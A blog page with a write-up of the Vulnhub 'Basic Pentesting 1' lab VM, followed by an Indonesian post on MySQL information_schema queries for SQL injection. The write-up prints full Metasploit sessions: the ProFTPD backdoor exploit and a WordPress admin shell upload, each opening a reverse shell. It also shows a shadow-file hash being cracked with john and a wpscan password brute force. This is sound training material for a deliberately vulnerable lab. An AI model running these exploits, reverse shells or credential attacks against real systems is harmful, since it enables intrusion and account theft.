Не важно, как медленно ты продвигаешься, главное, что ты не останавливаешься.


+ -

Wednesday 21 February 2018

[Vulnhub] Basic Pentesting 1

This is my write up how to pwn this box, if you have another solution, please comment below.

You can download the box on this link https://www.vulnhub.com/entry/basic-pentesting-1,216/

Information Gathering

First, I want to know virtualbox IP address that assigned to the box.
root@sempur:~# netdiscover -r 192.168.40.0/24 -i eth1
Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.40.1    08:00:27:ce:cd:b1      1      60  PCS Systemtechnik GmbH      
 192.168.40.1    0a:00:27:00:00:0a      1      60  Unknown vendor              
 192.168.40.100  08:00:27:14:06:50      1      60  PCS Systemtechnik GmbH
* this result maybe difference, based on your virtualbox configuration

After that, I want to know what services are running on this box. In this case, I used Nmap to know version, port, OS, etc.
root@sempur:~# nmap -sV 192.168.40.100

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-12 15:24 WIB
Nmap scan report for 192.168.40.100
Host is up (0.00020s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.32 seconds
You can see the result, there is FTP, SSH, HTTP services running on this box. I need to know, which services are vulnerable.

Exploring FTP service

Based on nmap result, this server using ProFTPD version 1.3.3c which is vulnerable to backdoor command execution. You can find by googling or using searchsploit for more information.

https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor
root@sempur:~# msfconsole
msf > use exploit/unix/ftp/proftpd_133c_backdoor 
msf exploit(proftpd_133c_backdoor) > set rhost 192.168.40.100
rhost => 192.168.40.100
msf exploit(proftpd_133c_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.40.101:4444 
[*] 192.168.40.100:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qZBpq8Ol9KN6lYs4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "qZBpq8Ol9KN6lYs4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.40.101:4444 -> 192.168.40.100:39812) at 2018-02-21 13:59:27 +0700

whoami
root
By using this exploit, you got root access, so you can explore this box as root.

Accessing SSH

After I got root by exploiting ProFTPD, I try to find another way to get in the box. Based on nmap result, there is SSH service running on this box. So, I think I can use this way to login as another user. I can use /etc/passwd and /etc/shadow to get password using john.

/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin

/etc/shadow
root:!:17484:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:*:17379:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
mysql:!:17486:0:99999:7:::
sshd:*:17486:0:99999:7:::


root@sempur:~# unshadow passwd shadow > p.txt
root@sempur:~# john p.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike      (marlinspike)
1g 0:00:00:00 DONE 1/3 (2018-02-21 11:34) 11.11g/s 88.88p/s 88.88c/s 88.88C/s marlinspike..marlinspikes
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root@sempur:~# john --show p.txt
marlinspike:marlinspike:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash

1 password hash cracked, 0 left
As you can see, john got password for marlinspike user. So, I try to login via SSH by using marlinspike as username and password. Apparently, user marlinspike is sudoers member.
root@sempur:~# ssh marlinspike@192.168.40.100
marlinspike@192.168.40.100's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

19 packages can be updated.
19 updates are security updates.

Last login: Mon Feb 12 06:50:26 2018 from 192.168.40.101
marlinspike@vtcsec:~$ whoami
marlinspike
marlinspike@vtcsec:~$ sudo su
[sudo] password for marlinspike: 
root@vtcsec:/home/marlinspike# whoami
root
root@vtcsec:/home/marlinspike#

Exploring HTTP Service

I try to bruteforce directory using dirb and I got that website made by wordpress on directory secret.
*You need add local DNS in file /etc/hosts
127.0.0.1            localhost
192.168.40.100       vtcsec


root@sempur:~# dirb http://192.168.40.100/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Feb 21 09:51:10 2018
URL_BASE: http://192.168.40.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.40.100/ ----
+ http://192.168.40.100/index.html (CODE:200|SIZE:177)                         
==> DIRECTORY: http://192.168.40.100/secret/                                   
+ http://192.168.40.100/server-status (CODE:403|SIZE:302)                      
                                                                               
---- Entering directory: http://192.168.40.100/secret/ ----
+ http://192.168.40.100/secret/index.php (CODE:301|SIZE:0)                     
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/                          
==> DIRECTORY: http://192.168.40.100/secret/wp-content/                        
==> DIRECTORY: http://192.168.40.100/secret/wp-includes/                       
+ http://192.168.40.100/secret/xmlrpc.php (CODE:405|SIZE:42)                   
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/ ----
+ http://192.168.40.100/secret/wp-admin/admin.php (CODE:302|SIZE:0)            
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/css/                      
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/images/                   
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/includes/                 
+ http://192.168.40.100/secret/wp-admin/index.php (CODE:302|SIZE:0)            
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/js/                       
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/maint/                    
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/network/                  
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/user/                     
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-content/ ----
+ http://192.168.40.100/secret/wp-content/index.php (CODE:200|SIZE:0)          
==> DIRECTORY: http://192.168.40.100/secret/wp-content/plugins/                
==> DIRECTORY: http://192.168.40.100/secret/wp-content/themes/                 
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/network/ ----
+ http://192.168.40.100/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)    
+ http://192.168.40.100/secret/wp-admin/network/index.php (CODE:302|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-admin/user/ ----
+ http://192.168.40.100/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)       
+ http://192.168.40.100/secret/wp-admin/user/index.php (CODE:302|SIZE:0)       
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-content/plugins/ ----
+ http://192.168.40.100/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)  
                                                                               
---- Entering directory: http://192.168.40.100/secret/wp-content/themes/ ----
+ http://192.168.40.100/secret/wp-content/themes/index.php (CODE:200|SIZE:0)   
                                                                               
-----------------
END_TIME: Wed Feb 21 09:51:33 2018
DOWNLOADED: 36896 - FOUND: 13

Next, I use wpscan to find more information about this website.
root@sempur:~# wpscan --url http://vtcsec/secret/ --enumerate u
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://vtcsec/secret/
[+] Started: Thu Feb 22 16:09:38 2018

[!] The WordPress 'http://vtcsec/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: ; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://vtcsec/secret/xmlrpc.php
[!] Upload directory has directory listing enabled: http://vtcsec/secret/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://vtcsec/secret/wp-includes/

[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 6 vulnerabilities identified from the version number

[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
    Reference: https://wpvulndb.com/vulnerabilities/8966
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.9.1

[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
    Reference: https://wpvulndb.com/vulnerabilities/8967
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.9.1

[!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
    Reference: https://wpvulndb.com/vulnerabilities/8968
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.9.1

[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
    Reference: https://wpvulndb.com/vulnerabilities/8969
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.9.1

[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/9006
    Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
    Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/ticket/42720
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.9.2

[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
    Reference: https://wpvulndb.com/vulnerabilities/9021
    Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
    Reference: https://github.com/quitten/doser.py
    Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389

[+] WordPress theme in use: twentyseventeen - v1.4

[+] Name: twentyseventeen - v1.4
 |  Latest version: 1.4 (up to date)
 |  Last updated: 2017-11-16T00:00:00.000Z
 |  Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
 |  Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
 |  Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+-------------------+
    | Id | Login | Name              |
    +----+-------+-------------------+
    | 1  | admin | admin – My secret |
    +----+-------+-------------------+
[!] Default first WordPress username 'admin' is still used

[+] Finished: Thu Feb 22 16:09:44 2018
[+] Requests Done: 103
[+] Memory used: 39.34 MB
[+] Elapsed time: 00:00:06
I got username, admin. So, I try to guess password 'admin', then I can log in to admin panel. Or, If you want using tool to bruteforce password, you can use wpscan to get password.
root@sempur:~# wpscan --url http://vtcsec/secret/ --username admin --wordlist /usr/share/wordlists/fasttrack.txt 
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://vtcsec/secret/
[+] Started: Thu Feb 22 16:35:23 2018

[!] The WordPress 'http://vtcsec/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: ; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://vtcsec/secret/xmlrpc.php
[!] Upload directory has directory listing enabled: http://vtcsec/secret/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://vtcsec/secret/wp-includes/

[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 6 vulnerabilities identified from the version number

[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
    Reference: https://wpvulndb.com/vulnerabilities/8966
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.9.1

[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
    Reference: https://wpvulndb.com/vulnerabilities/8967
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.9.1

[!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
    Reference: https://wpvulndb.com/vulnerabilities/8968
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.9.1

[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
    Reference: https://wpvulndb.com/vulnerabilities/8969
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.9.1

[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/9006
    Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
    Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/ticket/42720
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.9.2

[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
    Reference: https://wpvulndb.com/vulnerabilities/9021
    Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
    Reference: https://github.com/quitten/doser.py
    Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389

[+] WordPress theme in use: twentyseventeen - v1.4

[+] Name: twentyseventeen - v1.4
 |  Latest version: 1.4 (up to date)
 |  Last updated: 2017-11-16T00:00:00.000Z
 |  Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
 |  Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
 |  Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
  [+] [SUCCESS] Login : admin Password : admin                                  

  Brute Forcing 'admin' Time: 00:00:02 <==   > (130 / 223) 58.29%  ETA: 00:00:02
  +----+-------+------+----------+
  | Id | Login | Name | Password |
  +----+-------+------+----------+
  |    | admin |      | admin    |
  +----+-------+------+----------+

[+] Finished: Thu Feb 22 16:35:30 2018
[+] Requests Done: 225
[+] Memory used: 37.777 MB
[+] Elapsed time: 00:00:06

Get The Shell

After i got username and password, i need to get shell from this way. I use metasploit to upload the backdoor, and access the shell from msfconsole.

https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload

root@sempur:~# msfconsole
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v4.16.15-dev                         ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/unix/webapp/wp_admin_shell_upload 
msf exploit(wp_admin_shell_upload) > set username admin
username => admin
msf exploit(wp_admin_shell_upload) > set password admin
password => admin
msf exploit(wp_admin_shell_upload) > set rhost vtcsec
rhost => vtcsec
msf exploit(wp_admin_shell_upload) > set targeturi /secret
targeturi => /secret
msf exploit(wp_admin_shell_upload) > show options
msf exploit(wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.40.101:4444 
[*] Authenticating with WordPress using admin:admin...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /secret/wp-content/plugins/fVdnYcKEGU/nrdKKXzecZ.php...
[*] Sending stage (37543 bytes) to 192.168.40.100
[*] Meterpreter session 1 opened (192.168.40.101:4444 -> 192.168.40.100:45522) at 2018-02-22 15:15:44 +0700
[+] Deleted nrdKKXzecZ.php
[+] Deleted fVdnYcKEGU.php

meterpreter > sysinfo
Computer    : vtcsec
OS          : Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > shell 
whoami
www-data

Finally, i got shell from metasploit, but the user still www-data, if you want get root permission, you need escalate the privilege. Exploiting the FTP server is the best way to get root access (in my opinion).



Label :
5 λ .: February 2018 This is my write up how to pwn this box, if you have another solution, please comment below. You can download the box on this link https:/...

Monday 12 February 2018

Information Schema, Apa dan Kenapa?

Bagi sebagian orang mungkin sudah mengenal information schema, sebuah database yang ada pada MySQL. Sementara, sebagian orang lain seperti saya, ga tau apa itu information schema, dan apa kegunaannya untuk kita?. SQL Injection, meski teknik ini sudah lama ada, namun sampai saat ini masih banyak ditemukan celah melalui SQL injection. SQLMap salah satu tool yang populer untuk menjalankan SQL injection, mempermudah orang untuk melakukannya. Akan tetapi, menggunakan tool seperti ini, terkadang membuat orang malas untuk mengetahui, bagaimana SQL injection bekerja?. Maka dari itu, di artikel kali ini akan membahas tentang SQL Injection, terutama pada bagian Information Schema.

Sebelum melanjutkan, dapat membaca referensi dibawah ini:
Dari referensi diatas, terdapat cheatsheet SQL injection yang sering digunakan untuk MySQL.

SELECT schema_name FROM information_schema.schemata;
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Dari beberapa query diatas, information_schema digunakan untuk melihat nama colum, nama database, dan nama table. Lalu apa sebenarnya isi dari information_schema?


INFORMATION_SCHEMA is a database within each MySQL instance, the place that stores information about all the other databases that the MySQL server maintains. The INFORMATION_SCHEMA database contains several read-only tables. They are actually views, not base tables, so there are no files associated with them, and you cannot set triggers on them. Also, there is no database directory with that name. 
INFORMATION_SCHEMA provides access to database metadata, information about the MySQL server such as the name of a database or table, the data type of a column, or access privileges. Other terms that are sometimes used for this information are data dictionary and system catalog. web resmi MySQL
Sudah cukup jelas dari penjelasan web resmi MySQL bahwa database information_schema berisi tentang database yang ada/telah dibuat di dalam MySQL, termasuk nama table dan field. Itulah mengapa disetiap cheatsheet yang ada di internet pasti menggunakan information_schema untuk mendapatkan informasi table dan field.

Mendapatkan semua nama database

SELECT schema_name FROM information_schema.schemata;

 
Field schema_name pada table schemata berisi nama database yang ada di dalam MySQL, baik yang dibuat sendiri maupun yang sudah ada secara default, seperti information_schema, dst. Jika dibandingkan, query diatas sama seperti 'show databases;' pada MySQL.


Mendapatkan table dan field

SELECT table_schema, table_name, column_name FROM information_schema.columns;
SELECT table_schema,table_name FROM information_schema.tables;

Ada 2 cara untuk mendapatkan nama table, dapat melalui table information_schema.tables, atau information_schema.columns. Perbedaannya adalah pada table information_schema.tables tidak terdapat nama column dari table yang ada. Sehingga penggunaannya disesuaikan dengan kebutuhan.

information_schema.tables

information_schema.columns





Query diatas berhasil menampilkan nama database, table, dan field, untuk mendapatkan hasil yang optimal, ditambahkan where clause untuk menyaring informasi yang diinginkan.


Label :
5 λ .: February 2018 Bagi sebagian orang mungkin sudah mengenal information schema, sebuah database yang ada pada MySQL. Sementara, sebagian orang lain seperti ...
< >
Subscribe to: Posts (Atom)